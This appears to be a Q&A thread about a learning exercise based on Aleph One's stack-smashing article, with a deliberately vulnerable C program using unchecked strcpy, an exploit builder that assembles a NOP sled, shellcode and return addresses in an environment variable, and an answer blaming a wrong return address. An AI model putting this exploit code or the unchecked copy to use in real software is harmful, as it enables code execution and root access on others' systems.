# Instructions in C buffer being executed only as sudo

Tags: c, stack-overflow, sudo, shellcode, stack-smash

I'm working on a buffer overflow attack as described in Aleph One's article [Smashing the Stack for Fun and Profit](http://www.phrack.org/archives/49/p49_0x0e_Smashing%20The%20Stack%20For%20Fun%20And%20Profit_by_Aleph1.txt).

As proposed in the article, I've written a program (shellcode.c) that plants the malicious code (shellcode) into an environment variable ($EGG). After which $EGG is passed as an argument to the program (vulnerable.c) that I wish to attack, causing a buffer in that program to overflow and resulting in execution of the shellcode.

This is what the buffer looks like -

[NNNNNNNNN...NNNNNNSSSSSSS...SSSSSSSRRRRR...RRRRRR]

where N is the NOP instruction (see [NOP sled](http://en.wikipedia.org/wiki/NOP_slide)), S is my shellcode, and R is an address (return address into the buffer that will cause Instruction Pointer to jump from code segment into the above stack buffer and begin executing instructions).

**When I run the executables of shellcode.c and vulnerable.c as a normal user, I face the following problem -** When the Instruction Pointer is redirected into the buffer and encounters an instruction, a segmentation fault results. **However, upon executing the programs as sudo**, the instructions in the buffer are executed without any problems and the subsequent shellcode in the buffer is successfully executed, bringing up a root terminal thus completing the exploit. **Can anyone shed light on why this could be happening?**

I have disabled the following protections - *Stack Smashing Protection*, *ASLR* and *Linux's NX* (eXecute Disable Bit).

I am compiling using gcc 4.4.3 (Target: i486-linux-gnu) and executing on Ubuntu 10.04 (Lucid Lynx) running kernel 2.6.32.

The following are my two programs:

**vulnerable.c**

```
int main(int argc, char** argv) {
char buffer[512];

if(argc>1)
    strcpy(buffer,argv[1]);

return (EXIT_SUCCESS);
}
```

**shellcode.c**

```
int main(int argc,char** argv) {

char *buff, *ptr;
int *addr,retaddr;
int i;
int offset = DEFAULT_OFFSET;
int buffersize = DEFAULT_SIZE;

/* Set buffersize and predicted offset if arguments are supplied to the program
 */ 
if(argc>1)
    buffersize = atoi(argv[1]);
if(argc>2)
    offset = atoi(argv[2]);


if(!(buff=(char*)malloc(buffersize))) {
    printf("Can't allocate memory!");
    exit(1);
}

retaddr = getStackPointer() - offset;
printf("%d\n",strlen(shellcode));
printf("Using address: 0x%x\n",retaddr);

addr = (int *)buff;
for(i=0;i<buffersize;i+=4)
    *(addr++) = retaddr;

for(i=0;i<buffersize/2;i++)
    buff[i] = NOP;

ptr = buff + ((buffersize/2) - (strlen(shellcode)/2));
for(i=0;i<strlen(shellcode);i++)
    *(ptr++) = shellcode[i];

buff[buffersize -1] = '\0';

memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");

 return (EXIT_SUCCESS);
}
```

Answer (score 1, accepted):

I was getting a segmentation fault not because I wasn't root user but because the return address (RRRR...RRR) that I was hardcoding into the buffer was outside the stack address space of the executing program vulnerable.c. I fixed this by estimating the correct return address (by hit and trial, as described in Aleph One's article).